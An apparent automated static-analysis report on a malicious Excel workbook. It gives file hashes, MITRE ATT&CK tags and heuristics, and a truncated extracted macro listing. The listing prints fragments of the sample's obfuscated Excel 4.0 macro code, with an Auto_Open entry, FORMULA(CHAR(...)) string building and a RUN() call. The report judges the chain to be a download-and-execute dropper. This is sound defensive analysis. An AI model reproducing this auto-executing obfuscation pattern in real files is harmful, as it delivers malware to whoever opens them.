Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8fe323561b6725ab…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 235.0 KB
Created: 2020-05-21 07:36:35
Authoring application: Microsoft Excel
First seen: 2020-09-15
MD5: cdd1f1e592d13677cc352499748eb026
SHA-1: 6b22c2beefaa045adbbeed4205c2b9a3a58e6ce7
SHA-256: 8fe323561b6725ab567b768a754819a5468c9e054fa99fc7613fdb957234af51
Risk Score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file contains critical heuristics indicating obfuscated Excel 4.0 (XLM) macros with an Auto_Open execution chain. The XLM macro sheet is designed to automatically execute upon opening, likely to download and run a secondary payload. The obfuscation and auto-execution chain suggest a malicious intent to compromise the user's system.

Heuristics (3)

  • Excel 4.0 Auto_Open defined name (severity: critical, rule: OLE_XLM_AUTOOPEN_DEFINEDNAME)
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • Obfuscated XLM Auto_Open execution chain (severity: critical, rule: OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN)
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
  • Excel 4.0 (XLM) macro sheet present (severity: medium, rule: OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 129556 bytes
SHA-256: abe349040aba016a7b3c153f6e49451bb7cc8bcbc6d0544261f99254dc93ea45
Script preview (first 1,000 lines of the extracted script):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!HJ41083 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,DF62,"",-0.12121212121212121549
'  Sheet,CZ73,"",39.00000000000000000000
'  Sheet,FY104,"",-1.76703296703296719450
'  Sheet,HY146,"",-1.25000000000000000000
'  Sheet,GG160,"",430.00000000000000000000
'  Sheet,BJ174,"",743.00000000000000000000
'  Sheet,DF265,"",2.48275862068965524898
'  Sheet,JG283,"",-67.75000000000000000000
'  Sheet,IY298,"",1.18343195266272194210
'  Sheet,DS407,"",11.44927536231883991036
'  Sheet,S419,"",42.00000000000000000000
'  Sheet,CE422,"",-251.87500000000000000000
'  Sheet,E452,"",2887.50000000000000000000
'  Sheet,JN483,"",221.80015624999998635758
'  Sheet,D522,"",-31.25000000000000000000
'  Sheet,IB557,"",0.09367088607594936667
'  Sheet,EH567,"",-0.23324396782841821940
'  Sheet,JI607,"",1.73399014778325133435
'  Sheet,CR634,"FORMULA(CHAR(IK65504/EM59286)&CHAR(BP19117*EX20403)&CHAR(IK65504*FX2146)&CHAR(W45736*IA42047)&CHAR(FR31649+DX17536)&CHAR(HJ62720*IU5737)&CHAR(BP19117-GL39864)&CHAR(IK65504*JK20164)&CHAR(IK65504/CP38949)&CHAR(DL37019/HU47611)&CHAR(IA63888*GE63648)&CHAR(FR31649-EW7413)&CHAR(HJ62720-DX44823)&CHAR(CU46567/FZ26423)&CHAR(DL37019/EW33313)&CHAR(FR31649+II26387)&CHAR(HJ62720*FH31320)&CHAR(IA63888-BR44653)&CHAR(W45736-FW1250)&CHAR(FR31649*HA16013)&CHAR(CU46567+DA17691)&CHAR(IK65504*GO17900)&CHAR(BP19117/BN1394)&CHAR(JF7947*DY65004)&CHAR(FR31649-CA64180)&CHAR(IA63888/HV22928)&CHAR(FR31649/BW26240)&CHAR(FR31649-CL60221)&CHAR(CU46567/CV61521)&CHAR(FR31649-X4280)&CHAR(IK65504-EI11987)&CHAR(HJ62720+BH64300)&CHAR(W45736*CH46420)&CHAR(IK65504+DT17737)&CHAR(HJ62720-ET47799)&CHAR(BP19117*GX39054)&CHAR(JF7947-GO19933)&CHAR(CZ9923+IH2192)&CHAR(DL37019+DL53950)&CHAR(IA63888+DH35870)&CHAR(W45736+JJ47413)&CHAR(IA63888+HY146)&CHAR(JF7947*JU53200)&CHAR(IA63888*GH48770)&CHAR(DL37019*BH41645)&CHAR(IK65504+BW47145)&CHAR(CZ9923+DJ8113)&CHAR(DL37019*HM32614)&CHAR(FR31649*BM6675)&CHAR(DL37019*BO10322)&CHAR(CZ9923*BP16132)&CHAR(JF7947+FJ29242)&CHAR(FR31649*HD41584)&CHAR(HJ62720*HR11162)&CHAR(CZ9923+FM58474)&CHAR(IA63888-DX15304)&CHAR(CZ9923*BA46851)&CHAR(BP19117/EE19324)&CHAR(JF7947+CF51941)&CHAR(BP19117+IV41650)&CHAR(HJ62720/GK24123)&CHAR(IK65504+EX18976)&CHAR(FR31649/BW43462)&CHAR(DL37019*V25219)&CHAR(FR31649-JJ5622)&CHAR(DL37019*FY57927),CR635)",""
'  Sheet,CR636,RUN(JK28376),""
'  Sheet,CC658,"",-15.66666666666666607455
'  Sheet,HH692,"",0.14886731391585761308
'  Sheet,GX704,"",-0.08823529411764706454
'  Sheet,CI784,"",525.00000000000000000000
'  Sheet,DN834,"",-0.06666666666666666574
'  Sheet,JL847,"",-0.04347826086956521618
'  Sheet,BS861,"",-18.25000000000000000000
'  Sheet,DY891,"",-6.72131147540983597821
'  Sheet,BY1005,"FORMULA(CHAR(IP35977+GT17365)&CHAR(GV44362/FR19047)&CHAR(FH14172*JR43513)&CHAR(DG41916*IC50744)&CHAR(GV44362/CZ61393)&CHAR(IP35977/DL50895)&CHAR(IP35977*CG51370)&CHAR(IP35977*DU43010)&CHAR(JN43798-GS33389)&CHAR(JN43798-JL11425)&CHAR(IP35977+BM11538)&CHAR(GV44362/ER33989)&CHAR(JN43798/ED47100)&CHAR(EL38993+CX14477)&CHAR(JN43798-CC4535)&CHAR(EL38993+DB8427)&CHAR(GP11726/BC26024)&CHAR(JS19592-FR18862)&CHAR(JS19592/FZ62773)&CHAR(JN43798/HR35833)&CHAR(GV44362+EU43819)&CHAR(FH14172-FW52006)&CHAR(IP35977-EC63139)&CHAR(GV44362/O21374)&CHAR(EL38993+FN50518)&CHAR(EL38993*FT21220)&CHAR(JS19592*DT23756)&CHAR(JN43798-HQ40134)&CHAR(GV44362/IS35172)&CHAR(IP63702-FM46647)&CHAR(GV44362/BR2011)&CHAR(IP35977-FK1679)&CHAR(GV44362-CS19368)&CHAR(IP35977/BQ18889)&CHAR(GV44362-S62471)&CHAR(FH14172+FB11499)&CHAR(FH14172-GF13152)&CHAR(FH14172/BV8701)&CHAR(DG41916*O34127)&CHAR(GP11726*CN11348)&CHAR(GP11726+CM6759)&CHAR(GV44362+CX62535)&CHAR(GV44362+HI19007)&CHAR(FH14172-H8323)&CHAR(JN43798+S36338)&CHAR(GD57281/GM3141
... (truncated)